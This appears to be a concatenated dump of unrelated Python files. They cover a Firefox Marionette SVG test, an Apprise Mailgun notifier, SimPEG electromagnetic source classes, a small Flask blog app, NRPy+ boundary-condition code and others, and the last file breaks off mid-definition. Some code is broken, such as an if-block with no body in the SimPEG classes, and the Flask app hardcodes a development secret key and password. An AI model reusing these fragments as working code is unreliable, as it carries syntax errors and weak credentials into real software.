from marionette_driver.errors import JavascriptException from marionette_harness import MarionetteTestCase import testsuite class Test(MarionetteTestCase): def setUp(self): MarionetteTestCase.setUp(self) ts = testsuite.TestSuite() self.ts = ts self.marionette.set_pref("network.proxy.allow_hijacking_localhost", False) def test_svg(self): m = self.marionette svg_enabled = self.ts.t['test']['name'] == 'svg-enable' self.assertEqual(self.marionette.get_pref('svg.disabled'), not svg_enabled, msg="svg.disabled is not set correctly") self.marionette.timeout.implicit = 1 with m.using_context('content'): # img src url m.navigate(self.marionette.absolute_url("svg/img_src_url.html")) svg_elt = m.find_element('id', 'svgImgElem') self.assertEqual(svg_elt.get_property('width'), 450 if svg_enabled else 24, msg="img src url") # img data url m.navigate(self.marionette.absolute_url("svg/img_data_url.html")) svg_elt = m.find_element('id', 'svgImgElem') self.assertEqual(svg_elt.get_property('width'), 300 if svg_enabled else 24, msg="img data url") # object data url m.navigate(self.marionette.absolute_url("svg/object_data_url.html")) width = m.execute_script(''' var elt = document.getElementById("svgObjectElem"); return elt.getBoundingClientRect().width; ''') self.assertEqual(width, 450 if svg_enabled else 300, msg="object data url") # object remote url m.navigate(self.marionette.absolute_url("svg/object_remote_url.html")) svg_elt = m.find_element('id', 'svgObjectElem') width = m.execute_script(''' var elt = document.getElementById("svgObjectElem"); return elt.getBoundingClientRect().width; ''') self.assertEqual(width, 450 if svg_enabled else 300, msg="object remote url") # inline svg m.navigate(self.marionette.absolute_url("svg/inline_svg.html")) try: elt_width = m.execute_script(''' var elt = document.getElementById("inlineSVG"); return elt.width.baseVal.value; ''') except JavascriptException: elt_width = None self.assertEqual(elt_width, 300 if svg_enabled else None, msg='inline svg') # iframe remote url m.navigate(self.marionette.absolute_url("svg/iframe_remote_url.html")) m.switch_to_frame(m.find_element('id', 'svgIframeElem')) svg_elt = m.find_element('tag name', 'svg') width = m.execute_script(''' var elt = document.getElementsByTagName("svg")[0]; return elt.getBoundingClientRect().width; ''') self.assertEqual(width, 450 if svg_enabled else 500, msg="iframe remote url prompt")
py
7dfd123718e5bf455f9b765c57a115ec8aee43c1
# -*- coding: utf-8 -*- import unittest from letter_combinations import letter_combinations class TestLetterCombinations(unittest.TestCase): def test_letter_combinations(self): tests = [ ('', []), ('9', ["w", "x", "y", "z"]), ('91', ["w", "x", "y", "z"]), ('23', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]), ('213', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]), ('123', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]), ('231', ["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"]), ('111111', []), ] for test in tests: actual = letter_combinations(test[0]) expected = test[1] self.assertEqual(len(actual), len(expected), \ 'expected {} should have the same length as actual {}'\ .format(test, actual)) for exp in expected: self.assertIn(exp, actual, \ 'expected {} to be in actual {}'.format(exp, actual))
py
7dfd1248df97a3921947b48a98914ab3a426274c
# -*- coding: utf-8 -*- # # Copyright (C) 2019 Chris Caron <[email protected]> # All rights reserved. # # This code is licensed under the MIT License. # # Permission is hereby granted, free of charge, to any person obtaining a copy # of this software and associated documentation files(the "Software"), to deal # in the Software without restriction, including without limitation the rights # to use, copy, modify, merge, publish, distribute, sublicense, and / or sell # copies of the Software, and to permit persons to whom the Software is # furnished to do so, subject to the following conditions : # # The above copyright notice and this permission notice shall be included in # all copies or substantial portions of the Software. # # THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR # IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, # FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.IN NO EVENT SHALL THE # AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER # LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, # OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN # THE SOFTWARE. # Signup @ https://www.mailgun.com/ # # Each domain will have an API key associated with it. If you sign up you'll # get a sandbox domain to use. Or if you set up your own, they'll have # api keys associated with them too. Find your API key out by visiting # https://app.mailgun.com/app/domains # # From here you can click on the domain you're interested in. You can acquire # the API Key from here which will look something like: # 4b4f2918c6c21ba0a26ad2af73c07f4d-dk5f51da-8f91a0df # # You'll also need to know the domain that is associated with your API key. # This will be obvious with a paid account because it will be the domain name # you've registered with them. But if you're using a test account, it will # be name of the sandbox you've set up such as: # sandbox74bda3414c06kb5acb946.mailgun.org # # Knowing this, you can buid your mailgun url as follows: # mailgun://{user}@{domain}/{apikey} # mailgun://{user}@{domain}/{apikey}/{email} # # You can email as many addresses as you want as: # mailgun://{user}@{domain}/{apikey}/{email1}/{email2}/{emailN} # # The {user}@{domain} effectively assembles the 'from' email address # the email will be transmitted from. If no email address is specified # then it will also become the 'to' address as well. # import requests from .NotifyBase import NotifyBase from ..common import NotifyType from ..utils import parse_list from ..utils import is_email from ..utils import validate_regex from ..AppriseLocale import gettext_lazy as _ # Provide some known codes Mailgun uses and what they translate to: # Based on https://documentation.mailgun.com/en/latest/api-intro.html#errors MAILGUN_HTTP_ERROR_MAP = { 400: 'A bad request was made to the server.', 401: 'The provided API Key was not valid.', 402: 'The request failed for a reason out of your control.', 404: 'The requested API query is not valid.', 413: 'Provided attachment is to big.', } # Priorities class MailgunRegion(object): US = 'us' EU = 'eu' # Mailgun APIs MAILGUN_API_LOOKUP = { MailgunRegion.US: 'https://api.mailgun.net/v3/', MailgunRegion.EU: 'https://api.eu.mailgun.net/v3/', } # A List of our regions we can use for verification MAILGUN_REGIONS = ( MailgunRegion.US, MailgunRegion.EU, ) class NotifyMailgun(NotifyBase): """ A wrapper for Mailgun Notifications """ # The default descriptive name associated with the Notification service_name = 'Mailgun' # The services URL service_url = 'https://www.mailgun.com/' # All notification requests are secure secure_protocol = 'mailgun' # Mailgun advertises they allow 300 requests per minute. # 60/300 = 0.2 request_rate_per_sec = 0.20 # A URL that takes you to the setup/help of the specific protocol setup_url = 'https://github.com/caronc/apprise/wiki/Notify_mailgun' # The default region to use if one isn't otherwise specified mailgun_default_region = MailgunRegion.US # Define object templates templates = ( '{schema}://{user}@{host}:{apikey}/', '{schema}://{user}@{host}:{apikey}/{targets}', ) # Define our template tokens template_tokens = dict(NotifyBase.template_tokens, **{ 'user': { 'name': _('User Name'), 'type': 'string', 'required': True, }, 'host': { 'name': _('Domain'), 'type': 'string', 'required': True, }, 'apikey': { 'name': _('API Key'), 'type': 'string', 'private': True, 'required': True, }, 'targets': { 'name': _('Target Emails'), 'type': 'list:string', }, }) # Define our template arguments template_args = dict(NotifyBase.template_args, **{ 'name': { 'name': _('From Name'), 'type': 'string', 'map_to': 'from_name', }, 'region': { 'name': _('Region Name'), 'type': 'choice:string', 'values': MAILGUN_REGIONS, 'default': MailgunRegion.US, 'map_to': 'region_name', }, 'to': { 'alias_of': 'targets', }, }) def __init__(self, apikey, targets, from_name=None, region_name=None, **kwargs): """ Initialize Mailgun Object """ super(NotifyMailgun, self).__init__(**kwargs) # API Key (associated with project) self.apikey = validate_regex(apikey) if not self.apikey: msg = 'An invalid Mailgun API Key ' \ '({}) was specified.'.format(apikey) self.logger.warning(msg) raise TypeError(msg) # Validate our username if not self.user: msg = 'No Mailgun username was specified.' self.logger.warning(msg) raise TypeError(msg) # Parse our targets self.targets = parse_list(targets) # Store our region try: self.region_name = self.mailgun_default_region \ if region_name is None else region_name.lower() if self.region_name not in MAILGUN_REGIONS: # allow the outer except to handle this common response raise except: # Invalid region specified msg = 'The Mailgun region specified ({}) is invalid.' \ .format(region_name) self.logger.warning(msg) raise TypeError(msg) # Get our From username (if specified) self.from_name = from_name # Get our from email address self.from_addr = '{user}@{host}'.format(user=self.user, host=self.host) if not is_email(self.from_addr): # Parse Source domain based on from_addr msg = 'Invalid ~From~ email format: {}'.format(self.from_addr) self.logger.warning(msg) raise TypeError(msg) def send(self, body, title='', notify_type=NotifyType.INFO, **kwargs): """ Perform Mailgun Notification """ # error tracking (used for function return) has_error = False # Prepare our headers headers = { 'User-Agent': self.app_id, 'Accept': 'application/json', } # Prepare our payload payload = { 'from': '{name} <{addr}>'.format( name=self.app_id if not self.from_name else self.from_name, addr=self.from_addr), 'subject': title, 'text': body, } # Prepare our URL as it's based on our hostname url = '{}{}/messages'.format( MAILGUN_API_LOOKUP[self.region_name], self.host) # Create a copy of the targets list emails = list(self.targets) if len(emails) == 0: # No email specified; use the from emails.append(self.from_addr) while len(emails): # Get our email to notify email = emails.pop(0) # Prepare our user payload['to'] = '{} <{}>'.format(email, email) # Some Debug Logging self.logger.debug('Mailgun POST URL: {} (cert_verify={})'.format( url, self.verify_certificate)) self.logger.debug('Mailgun Payload: {}' .format(payload)) # Always call throttle before any remote server i/o is made self.throttle() try: r = requests.post( url, auth=("api", self.apikey), data=payload, headers=headers, verify=self.verify_certificate, ) if r.status_code != requests.codes.ok: # We had a problem status_str = \ NotifyBase.http_response_code_lookup( r.status_code, MAILGUN_API_LOOKUP) self.logger.warning( 'Failed to send Mailgun notification to {}: ' '{}{}error={}.'.format( email, status_str, ', ' if status_str else '', r.status_code)) self.logger.debug( 'Response Details:\r\n{}'.format(r.content)) # Mark our failure has_error = True continue else: self.logger.info( 'Sent Mailgun notification to {}.'.format(email)) except requests.RequestException as e: self.logger.warning( 'A Connection error occured sending Mailgun:%s ' % ( email) + 'notification.' ) self.logger.debug('Socket Exception: %s' % str(e)) # Mark our failure has_error = True continue return not has_error def url(self, privacy=False, *args, **kwargs): """ Returns the URL built dynamically based on specified arguments. """ # Define any arguments set args = { 'format': self.notify_format, 'overflow': self.overflow_mode, 'verify': 'yes' if self.verify_certificate else 'no', 'region': self.region_name, } if self.from_name is not None: # from_name specified; pass it back on the url args['name'] = self.from_name return '{schema}://{user}@{host}/{apikey}/{targets}/?{args}'.format( schema=self.secure_protocol, host=self.host, user=NotifyMailgun.quote(self.user, safe=''), apikey=self.pprint(self.apikey, privacy, safe=''), targets='/'.join( [NotifyMailgun.quote(x, safe='') for x in self.targets]), args=NotifyMailgun.urlencode(args)) @staticmethod def parse_url(url): """ Parses the URL and returns enough arguments that can allow us to substantiate this object. """ results = NotifyBase.parse_url(url) if not results: # We're done early as we couldn't load the results return results # Get our entries; split_path() looks after unquoting content for us # by default results['targets'] = NotifyMailgun.split_path(results['fullpath']) # Our very first entry is reserved for our api key try: results['apikey'] = results['targets'].pop(0) except IndexError: # We're done - no API Key found results['apikey'] = None if 'name' in results['qsd'] and len(results['qsd']['name']): # Extract from name to associate with from address results['from_name'] = \ NotifyMailgun.unquote(results['qsd']['name']) if 'region' in results['qsd'] and len(results['qsd']['region']): # Extract from name to associate with from address results['region_name'] = \ NotifyMailgun.unquote(results['qsd']['region']) # Support the 'to' variable so that we can support targets this way too # The 'to' makes it easier to use yaml configuration if 'to' in results['qsd'] and len(results['qsd']['to']): results['targets'] += \ NotifyMailgun.parse_list(results['qsd']['to']) return results
py
7dfd12afeb254731576fdb52ac87f249536e7e6b
# Copyright 2018 Canonical Ltd # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import mock import charm.vault_utils as vault_utils import charms_openstack.test_utils as test_utils class TestVaultUtils(test_utils.PatchHelper): def test_retrieve_secret_id(self): self.patch_object(vault_utils, 'hvac') hvac_client = mock.MagicMock() self.hvac.Client.return_value = hvac_client response = mock.MagicMock() response.status_code = 200 response.json.return_value = {'data': {'secret_id': 'FAKE_SECRET_ID'}} hvac_client._post.return_value = response self.assertEqual( vault_utils.retrieve_secret_id('url', 'token'), 'FAKE_SECRET_ID') hvac_client._post.assert_called_with('/v1/sys/wrapping/unwrap')
py
7dfd12c0d3b38c6238ae2cf1d7aae5304cce34d8
from __future__ import print_function from __future__ import absolute_import from __future__ import division import numpy as np import scipy.sparse as sp from SimPEG import Maps, mkvc from SimPEG.EM.FDEM.SrcFDEM import BaseFDEMSrc as FDEMBaseSrc from SimPEG.EM.Utils import omega from .Utils.sourceUtils import homo1DModelSource ################# ### Sources ### ################# class BaseNSEMSrc(FDEMBaseSrc): ''' Sources for the NSEM problem. Use the SimPEG BaseSrc, since the source fields share properties with the transmitters. :param float freq: The frequency of the source :param list rxList: A list of receivers associated with the source ''' freq = None #: Frequency (float) def __init__(self, rxList, freq): self.freq = float(freq) FDEMBaseSrc.__init__(self, rxList) # 1D sources class Planewave_xy_1DhomotD(BaseNSEMSrc): """ NSEM source for both polarizations (x and y) for the total Domain. It calculates fields calculated based on conditions on the boundary of the domain. """ def __init__(self, rxList, freq): BaseNSEMSrc.__init__(self, rxList, freq) # Need to implement such that it works for all dims. # Rename to be more descriptive class Planewave_xy_1Dprimary(BaseNSEMSrc): """ NSEM planewave source for both polarizations (x and y) estimated from a single 1D primary models. """ def __init__(self, rxList, freq): # assert mkvc(self.mesh.hz.shape,1) == mkvc(sigma1d.shape,1),'The number of values in the 1D background model does not match the number of vertical cells (hz).' self.sigma1d = None BaseNSEMSrc.__init__(self, rxList, freq) def ePrimary(self, problem): # Get primary fields for both polarizations if self.sigma1d is None: # Set the sigma1d as the 1st column in the background model if len(problem._sigmaPrimary) == problem.mesh.nC: if problem.mesh.dim == 1: self.sigma1d = problem.mesh.r( problem._sigmaPrimary, 'CC', 'CC', 'M')[:] elif problem.mesh.dim == 3: self.sigma1d = problem.mesh.r( problem._sigmaPrimary, 'CC', 'CC', 'M')[0, 0, :] # Or as the 1D model that matches the vertical cell number elif len(problem._sigmaPrimary) == problem.mesh.nCz: self.sigma1d = problem._sigmaPrimary if self._ePrimary is None: self._ePrimary = homo1DModelSource( problem.mesh, self.freq, self.sigma1d) return self._ePrimary def bPrimary(self, problem): # Project ePrimary to bPrimary # Satisfies the primary(background) field conditions if problem.mesh.dim == 1: C = problem.mesh.nodalGrad elif problem.mesh.dim == 3: C = problem.mesh.edgeCurl bBG_bp = (- C * self.ePrimary(problem)) * (1 / (1j * omega(self.freq))) return bBG_bp def S_e(self, problem): """ Get the electrical field source """ e_p = self.ePrimary(problem) Map_sigma_p = Maps.SurjectVertical1D(problem.mesh) sigma_p = Map_sigma_p._transform(self.sigma1d) # Make mass matrix # Note: M(sig) - M(sig_p) = M(sig - sig_p) # Need to deal with the edge/face discrepencies between 1d/2d/3d if problem.mesh.dim == 1: Mesigma = problem.mesh.getFaceInnerProduct(problem.sigma) Mesigma_p = problem.mesh.getFaceInnerProduct(sigma_p) if problem.mesh.dim == 2: pass if problem.mesh.dim == 3: Mesigma = problem.MeSigma Mesigma_p = problem.mesh.getEdgeInnerProduct(sigma_p) return (Mesigma - Mesigma_p) * e_p def S_eDeriv(self, problem, v, adjoint=False): """ The derivative of S_e with respect to """ return self.S_eDeriv_m(problem, v, adjoint) def S_eDeriv_m(self, problem, v, adjoint=False): ''' Get the derivative of S_e wrt to sigma (m) ''' # Need to deal with if problem.mesh.dim == 1: # Need to use the faceInnerProduct ePri = self.ePrimary(problem)[:, 1] MsigmaDeriv = ( problem.mesh.getFaceInnerProductDeriv(problem.sigma)(ePri) * problem.sigmaDeriv) # MsigmaDeriv = ( MsigmaDeriv * MsigmaDeriv.T)**2 if adjoint: # return MsigmaDeriv.T * v else: # v should be nC size return MsigmaDeriv * v if problem.mesh.dim == 2: raise NotImplementedError('The NSEM 2D problem is not implemented') if problem.mesh.dim == 3: # Need to take the derivative of both u_px and u_py # And stack them to be of the correct size e_p = self.ePrimary(problem) if adjoint: return ( problem.MeSigmaDeriv( e_p[:, 0], v[:int(v.shape[0]/2)], adjoint ) + problem.MeSigmaDeriv( e_p[:, 1], v[int(v.shape[0]/2):], adjoint ) ) # return sp.hstack(( # problem.MeSigmaDeriv(e_p[:, 0]).T, # problem.MeSigmaDeriv(e_p[:, 1]).T)) * v else: return np.hstack(( mkvc(problem.MeSigmaDeriv(e_p[:, 0], v, adjoint), 2), mkvc(problem.MeSigmaDeriv(e_p[:, 1], v, adjoint), 2))) class Planewave_xy_3Dprimary(BaseNSEMSrc): """ NSEM source for both polarizations (x and y) given a 3D primary model. It assigns fields calculated from the 1D model as fields in the full space of the problem. """ def __init__(self, rxList, freq): # assert mkvc(self.mesh.hz.shape,1) == mkvc(sigma1d.shape,1),'The number of values in the 1D background model does not match the number of vertical cells (hz).' self.sigmaPrimary = None BaseNSEMSrc.__init__(self, rxList, freq) # Hidden property of the ePrimary self._ePrimary = None def ePrimary(self, problem): # Get primary fields for both polarizations self.sigmaPrimary = problem._sigmaPrimary if self._ePrimary is None: self._ePrimary = homo3DModelSource( problem.mesh, self.sigmaPrimary, self.freq) return self._ePrimary def bPrimary(self, problem): # Project ePrimary to bPrimary # Satisfies the primary(background) field conditions if problem.mesh.dim == 1: C = problem.mesh.nodalGrad elif problem.mesh.dim == 3: C = problem.mesh.edgeCurl bBG_bp = ( (- C * self.ePrimary(problem)) * (1 / (1j * omega(self.freq)))) return bBG_bp def S_e(self, problem): """ Get the electrical field source """ e_p = self.ePrimary(problem) Map_sigma_p = Maps.SurjectVertical1D(problem.mesh) sigma_p = Map_sigma_p._transform(self.sigma1d) # Make mass matrix # Note: M(sig) - M(sig_p) = M(sig - sig_p) # Need to deal with the edge/face discrepencies between 1d/2d/3d if problem.mesh.dim == 1: Mesigma = problem.mesh.getFaceInnerProduct(problem.sigma) Mesigma_p = problem.mesh.getFaceInnerProduct(sigma_p) if problem.mesh.dim == 2: pass if problem.mesh.dim == 3: Mesigma = problem.MeSigma Mesigma_p = problem.mesh.getEdgeInnerProduct(sigma_p) return (Mesigma - Mesigma_p) * e_p def S_eDeriv_m(self, problem, v, adjoint=False): ''' Get the derivative of S_e wrt to sigma (m) ''' # Need to deal with if problem.mesh.dim == 1: # Need to use the faceInnerProduct MsigmaDeriv = ( problem.mesh.getFaceInnerProductDeriv( problem.sigma)(self.ePrimary(problem)[:, 1]) * problem.sigmaDeriv) # MsigmaDeriv = ( MsigmaDeriv * MsigmaDeriv.T)**2 if problem.mesh.dim == 2: pass if problem.mesh.dim == 3: # Need to take the derivative of both u_px and u_py ePri = self.ePrimary(problem) if adjoint: return ( problem.MeSigmaDeriv( ePri[:, 0], v[:int(v.shape[0]/2)], adjoint ) + problem.MeSigmaDeriv( ePri[:, 1], v[int(v.shape[0]/2):], adjoint ) ) # return sp.hstack(( # problem.MeSigmaDeriv(ePri[:, 0]).T, # problem.MeSigmaDeriv(ePri[:, 1]).T)) * v else: return np.hstack(( mkvc(problem.MeSigmaDeriv(ePri[:, 0], v, adjoint), 2), mkvc(problem.MeSigmaDeriv(ePri[:, 1], v, adjoint), 2) )) if adjoint: # return MsigmaDeriv.T * v else: # v should be nC size return MsigmaDeriv * v
py
7dfd12c43abf5401c01cdb8fa979998733d45dfc
# @l2g 2032 python3 # [2032] Two Out of Three # Difficulty: Easy # https://leetcode.com/problems/two-out-of-three # # Given three integer arrays nums1,nums2,and nums3, # return a distinct array containing all the values that are present in at least two out of the three arrays. # You may return the values in any order. # # Example 1: # # Input: nums1 = [1,1,3,2], nums2 = [2,3], nums3 = [3] # Output: [3,2] # Explanation: The values that are present in at least two arrays are: # - 3, in all three arrays. # - 2, in nums1 and nums2. # # Example 2: # # Input: nums1 = [3,1], nums2 = [2,3], nums3 = [1,2] # Output: [2,3,1] # Explanation: The values that are present in at least two arrays are: # - 2, in nums2 and nums3. # - 3, in nums1 and nums2. # - 1, in nums1 and nums3. # # Example 3: # # Input: nums1 = [1,2,2], nums2 = [4,3,3], nums3 = [5] # Output: [] # Explanation: No value is present in at least two arrays. # # # Constraints: # # 1 <= nums1.length, nums2.length, nums3.length <= 100 # 1 <= nums1[i], nums2[j], nums3[k] <= 100 # # from typing import List class Solution: def twoOutOfThree(self, nums1: List[int], nums2: List[int], nums3: List[int]) -> List[int]: ans = set() set_1 = set(nums1) set_2 = set(nums2) set_3 = set(nums3) ans = ans | (set_1 & set_2) ans = ans | (set_2 & set_3) ans = ans | (set_3 & set_1) return list(ans) if __name__ == "__main__": import os import pytest pytest.main([os.path.join("tests", "test_2032.py")])
py
7dfd12cc1694f6d53b708f59b84ee687147ee292
# -*- coding: utf-8 -*- # all the imports import os import sqlite3 from flask import Flask, request, session, g, redirect, url_for, abort, render_template, flash app = Flask(__name__) # create the application instance :) app.config.from_object(__name__) # load config from this file, flaskr.py # Load default config and override config from an environment variable app.config.update(dict( DATABASE=os.path.join(app.root_path, 'alacenapp.db'), SECRET_KEY='development key', USERNAME='admin', PASSWORD='default' )) app.config.from_envvar('FLASKR_SETTINGS', silent=True) def connect_db(): """Connects to the specific database""" rv = sqlite3.connect(app.config['DATABASE']) rv.row_factory = sqlite3.Row return rv def get_db(): """Opens a new database connection if there is none yet for the current application context """ if not hasattr(g, 'sqlite_db'): g.sqlite_db = connect_db() return g.sqlite_db @app.teardown_appcontext def close_db(error): """Closes the database again at the end of the request.""" if hasattr(g, 'sqlite_db'): g.sqlite_db.close() def init_db(): db = get_db() with app.open_resource('schema.sql', mode='r') as f: db.cursor().executescript(f.read()) db.commit() @app.cli.command('initdb') def initdb_command(): """Initializes the database.""" init_db() print('Initialized the database.') @app.route('/') def show_entries(): db = get_db() cur = db.execute('select title, text from entries order by id desc') entries = cur.fetchall() return render_template('show_entries.html',entries=entries) @app.route('/add', methods=['POST']) def add_entry(): if not session.get('logged_in'): abort(401) db = get_db() db.execute('insert into entries (title, text) values (?, ?)', [request.form['title'], request.form['text']]) db.commit() flash('New entry was succesfully posted') return redirect(url_for('show entries')) @app.route('/login', methods=['GET', 'POST']) def login(): error = None if request.method == 'POST': if request.form['username'] != app.config['USERNAME']: error = 'Invalid username' elif request.form['password'] != app.config['PASSWORD']: error = 'Invalid password' else: session['logged_in'] = True flash('You were logged in') return redirect(url_for('show_entries')) return render_template('login.html', error=error) @app.route('/logout') def logout(): session.pop('logged_in', None) flash('You were logged out') return redirect(url_for('show_entries'))
py
7dfd132d0e58de7633ffb7978ceb26338adec682
# This module provides functions for setting up Curvilinear boundary conditions, # as documented in Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb # Author: Zachariah B. Etienne # zachetie **at** gmail **dot* com # First we import needed core NRPy+ modules from outputC import * import NRPy_param_funcs as par import grid as gri import loop as lp import indexedexp as ixp import finite_difference as fin import reference_metric as rfm import sys def Set_up_CurviBoundaryConditions(outdir="CurviBoundaryConditions/",verbose=True): # Step 0: Set up reference metric in case it hasn't already been set up. # (Doing it twice hurts nothing). rfm.reference_metric() # Step 1: Set unit-vector dot products (=parity) for each of the 10 parity condition types parity = ixp.zerorank1(DIM=10) UnitVectors_inner = ixp.zerorank2() xx0_inbounds, xx1_inbounds, xx2_inbounds = sp.symbols("xx0_inbounds xx1_inbounds xx2_inbounds", real=True) for i in range(3): for j in range(3): UnitVectors_inner[i][j] = rfm.UnitVectors[i][j].subs(rfm.xx[0], xx0_inbounds).subs(rfm.xx[1], xx1_inbounds).subs( rfm.xx[2], xx2_inbounds) # Type 0: scalar parity[0] = sp.sympify(1) # Type 1: i0-direction vector or one-form # Type 2: i1-direction vector or one-form # Type 3: i2-direction vector or one-form for i in range(3): for Type in range(1, 4): parity[Type] += rfm.UnitVectors[Type - 1][i] * UnitVectors_inner[Type - 1][i] # Type 4: i0i0-direction rank-2 tensor # parity[4] = parity[1]*parity[1] # Type 5: i0i1-direction rank-2 tensor # Type 6: i0i2-direction rank-2 tensor # Type 7: i1i1-direction rank-2 tensor # Type 8: i1i2-direction rank-2 tensor # Type 9: i2i2-direction rank-2 tensor count = 4 for i in range(3): for j in range(i, 3): parity[count] = parity[i + 1] * parity[j + 1] count = count + 1 lhs_strings = [] for i in range(10): lhs_strings.append("parity[" + str(i) + "]") outputC(parity, lhs_strings, outdir + "parity_conditions_symbolic_dot_products.h") # Step 2.a: Generate outdir+gridfunction_defines.h file, # containing human-readable gridfunction aliases evolved_variables_list, auxiliary_variables_list, auxevol_variables_list = gri.output__gridfunction_defines_h__return_gf_lists(outdir) # Step 2.b: set the parity conditions on all gridfunctions in gf_list, # based on how many digits are at the end of their names def set_parity_types(gf_list): parity_type = [] for i in range(len(gf_list)): varname = gf_list[i] parity_type__orig_len = len(parity_type) if len(varname) > 2: if varname[-2] == "0" and varname[-1] == "0": # In Python, a[-1] points to the last # element of a list; a[-2] the # second-to-last element, etc. parity_type.append(4) elif varname[-2] == "0" and varname[-1] == "1": parity_type.append(5) elif varname[-2] == "0" and varname[-1] == "2": parity_type.append(6) elif varname[-2] == "1" and varname[-1] == "1": parity_type.append(7) elif varname[-2] == "1" and varname[-1] == "2": parity_type.append(8) elif varname[-2] == "2" and varname[-1] == "2": parity_type.append(9) if len(varname) > 1 and len(parity_type) == parity_type__orig_len: if varname[-1] == "0": parity_type.append(1) elif varname[-1] == "1": parity_type.append(2) elif varname[-1] == "2": parity_type.append(3) if varname[len(varname) - 1].isdigit() == False: parity_type.append(0) if len(parity_type) == parity_type__orig_len: print("Error: Could not figure out parity type for evolved variable: " + varname) sys.exit(1) return parity_type evol_parity_type = set_parity_types(evolved_variables_list) aux_parity_type = set_parity_types(auxiliary_variables_list) auxevol_parity_type = set_parity_types(auxevol_variables_list) # Step 2.c: Output all gridfunctions to outdir+"/gridfunction_defines.h" # ... then append to the file the parity type for each gridfunction. with open(outdir + "/gridfunction_defines.h", "a") as file: file.write("\n\n/* PARITY TYPES FOR ALL GRIDFUNCTIONS.\n") file.write( " SEE \"Tutorial-Start_to_Finish-Curvilinear_BCs.ipynb\" FOR DEFINITIONS. */\n") if len(evolved_variables_list) > 0: file.write("const int8_t evol_gf_parity[" + str(len(evolved_variables_list)) + "] = { ") for i in range(len(evolved_variables_list) - 1): file.write(str(evol_parity_type[i]) + ", ") file.write(str(evol_parity_type[len(evolved_variables_list) - 1]) + " };\n") if len(auxiliary_variables_list) > 0: file.write("const int8_t aux_gf_parity[" + str(len(auxiliary_variables_list)) + "] = { ") for i in range(len(auxiliary_variables_list) - 1): file.write(str(aux_parity_type[i]) + ", ") file.write(str(aux_parity_type[len(auxiliary_variables_list) - 1]) + " };\n") if len(auxevol_variables_list) > 0: file.write("const int8_t auxevol_gf_parity[" + str(len(auxevol_variables_list)) + "] = { ") for i in range(len(auxevol_variables_list) - 1): file.write(str(auxevol_parity_type[i]) + ", ") file.write(str(auxevol_parity_type[len(auxevol_variables_list) - 1]) + " };\n") if verbose == True: for i in range(len(evolved_variables_list)): print("Evolved gridfunction \"" + evolved_variables_list[i] + "\" has parity type " + str( evol_parity_type[i]) + ".") for i in range(len(auxiliary_variables_list)): print("Auxiliary gridfunction \"" + auxiliary_variables_list[i] + "\" has parity type " + str( aux_parity_type[i]) + ".") for i in range(len(auxevol_variables_list)): print("AuxEvol gridfunction \"" + auxevol_variables_list[i] + "\" has parity type " + str( auxevol_parity_type[i]) + ".") # Step 3: Find the Eigen-Coordinate and set up the Eigen-Coordinate's reference metric: CoordSystem_orig = par.parval_from_str("reference_metric::CoordSystem") par.set_parval_from_str("reference_metric::CoordSystem", rfm.get_EigenCoord()) rfm.reference_metric() # Step 4: Output C code for the Eigen-Coordinate mapping from xx->Cartesian: rfm.xxCart_h("EigenCoord_xxCart", "../set_Cparameters.h", outdir + "EigenCoord_xxCart.h") # Step 5: Output the Eigen-Coordinate mapping from Cartesian->xx: # Step 5.a: Sanity check: First make sure that rfm.Cart_to_xx has been set. Error out if not! if rfm.Cart_to_xx[0] == 0 or rfm.Cart_to_xx[1] == 0 or rfm.Cart_to_xx[2] == 0: print("ERROR: rfm.Cart_to_xx[], which maps Cartesian -> xx, has not been set for") print(" reference_metric::CoordSystem = " + par.parval_from_str("reference_metric::CoordSystem")) print(" Boundary conditions in curvilinear coordinates REQUIRE this be set.") sys.exit(1) # Step 5.b: Output C code for the Eigen-Coordinate mapping from Cartesian->xx: outputC([rfm.Cart_to_xx[0], rfm.Cart_to_xx[1], rfm.Cart_to_xx[2]], ["Cart_to_xx0_inbounds", "Cart_to_xx1_inbounds", "Cart_to_xx2_inbounds"], outdir + "EigenCoord_Cart_to_xx.h") # Step 6: Restore reference_metric::CoordSystem back to the original CoordSystem par.set_parval_from_str("reference_metric::CoordSystem", CoordSystem_orig) rfm.reference_metric()
py
7dfd1488d683cdf9ac603a568f3c6f0788b53acc
from typing import Union, List, Callable from hashlib import md5 class TagDesc: __slots__ = ['tag', 'attrs', 'chld'] def __init__(self, tag: Union[str, bool], attrs: dict, chld: 'TagDesc'=None) -> None: """ tag: a tag selector (either a string with the tag name or a boolean for glob attrs: a dict of the attributes of the tag should have chld: a child selector, when you need to target more than one tag to query the right element """ self.tag = tag self.attrs = attrs self.chld = chld class Filter: __slots__ = ['content', 'next', 'exclude', 'flatten', 'transform'] def __init__(self, content: TagDesc, next_chap: TagDesc, exclude: List[TagDesc], flatten:List[TagDesc]=None, transform:List[Callable[[str],str]]=None) -> None: """ content: a selector for the tag that contains the text next_chap: a selector for the tag that contains the url exclude: a list of selectors to remove from the extracted document flatten: a list of selectors to flatten (i.e. remove the tags but keep the text) from the document transform: a list of functions to run over the final text """ self.content = content self.next = next_chap self.exclude = exclude if flatten is None: flatten = [] self.flatten = flatten if transform is None: transform = [] self.transform = transform class BookAttrs: __slots__ = ['identifier', 'title', 'abbrev', 'lang', 'author'] def __init__(self, title: str, abbrev: str, lang='en', author='generated') -> None: self.identifier = md5(title.encode()).hexdigest() self.title = title self.abbrev = abbrev self.lang = 'en' self.author = author class Page: __slots__ = ['next', 'contents'] def 